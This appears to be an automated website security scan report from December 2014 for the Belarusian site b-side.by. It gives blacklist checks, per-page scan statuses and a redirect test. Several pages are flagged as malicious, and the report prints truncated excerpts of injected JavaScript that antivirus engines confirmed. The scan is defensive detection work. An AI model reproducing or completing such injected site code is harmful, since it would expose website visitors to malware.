Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=b-side.by
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://b-side.by/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://b-side.by/ | 200 OK Content-Length: 22423 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets ...[3595 bytes skipped]... Antivirus reports:
| ||
http://b-side.by/media/system/js/caption.js | 200 OK Content-Length: 1961 Content-Type: application/javascript | clean |
http://b-side.by/media/system/js/modal.js | 200 OK Content-Length: 10586 Content-Type: application/javascript | clean |
http://b-side.by/templates/bsidenew/javascript/opacity.js | 404 Not Found Content-Length: 318 Content-Type: text/html | clean |
http://b-side.by/test404page.js | 404 Not Found Content-Length: 292 Content-Type: text/html | clean |
http://b-side.by/templates/bsidenew/js/changetime.js | 200 OK Content-Length: 325 Content-Type: application/javascript | clean |
http://b-side.by//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1843 Content-Type: text/html | clean |
http://b-side.by/index.php | 200 OK Content-Length: 17095 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: season.b-side.by <?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru" dir="ltr" > <head> <base href="http://b-side.by/index.php" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content ...[4193 bytes skipped]... | ||
http://b-side.by/ru/gruppa | 200 OK Content-Length: 19650 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets ...[3595 bytes skipped]... Antivirus reports:
| ||
http://b-side.by//yandex.st/share/share.js/ | 404 Not Found Content-Length: 1843 Content-Type: text/html | clean |
http://b-side.by/ru/kontakty | 200 OK Content-Length: 6860 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: season.b-side.by <?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru" dir="ltr" > <head> <base href="http://b-side.by/kontakty" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content= ...[4355 bytes skipped]... | ||
http://b-side.by/ru/ | 200 OK Content-Length: 17089 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: season.b-side.by <?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru" dir="ltr" > <head> <base href="http://b-side.by/ru/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="inde ...[4193 bytes skipped]... | ||
http://b-side.by/be | 200 OK Content-Length: 15991 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: season.b-side.by <?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="be-by" lang="be-by" dir="ltr" > <head> <base href="http://b-side.by/be" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index ...[4277 bytes skipped]... | ||
http://b-side.by/be/gruppa | 200 OK Content-Length: 19134 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets ...[3595 bytes skipped]... Antivirus reports:
| ||
http://b-side.by/be/kontakty | 200 OK Content-Length: 12011 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets ...[3595 bytes skipped]... Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: b-side.by
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 22:52:16 GMT
Pragma: no-cache
Server: nginx/1.6.2
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Dec 2014 22:52:16 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: uvQKgdQUcFI=cnIQQTn; expires=Sat, 20-Dec-2014 04:50:00 GMT
Set-Cookie: 4b784a147f6fb1b2c119a269cb048e5b=ugtghl48o500vgds6m460eiko1; path=/
Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: jfcookie[lang]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.4.35
GET / HTTP/1.1
Host: b-side.by
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 22:52:16 GMT
Pragma: no-cache
Server: nginx/1.6.2
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Dec 2014 22:52:16 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: uvQKgdQUcFI=cnIQQTn; expires=Sat, 20-Dec-2014 04:50:00 GMT
Set-Cookie: 4b784a147f6fb1b2c119a269cb048e5b=ugtghl48o500vgds6m460eiko1; path=/
Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: jfcookie[lang]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.4.35
Second query (visit from search engine):
GET / HTTP/1.1
Host: b-side.by
Referer: http://www.google.com/search?q=b-side.by
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: b-side.by
Referer: http://www.google.com/search?q=b-side.by
Result:
The result is similar to the first query. There are no suspicious redirects found.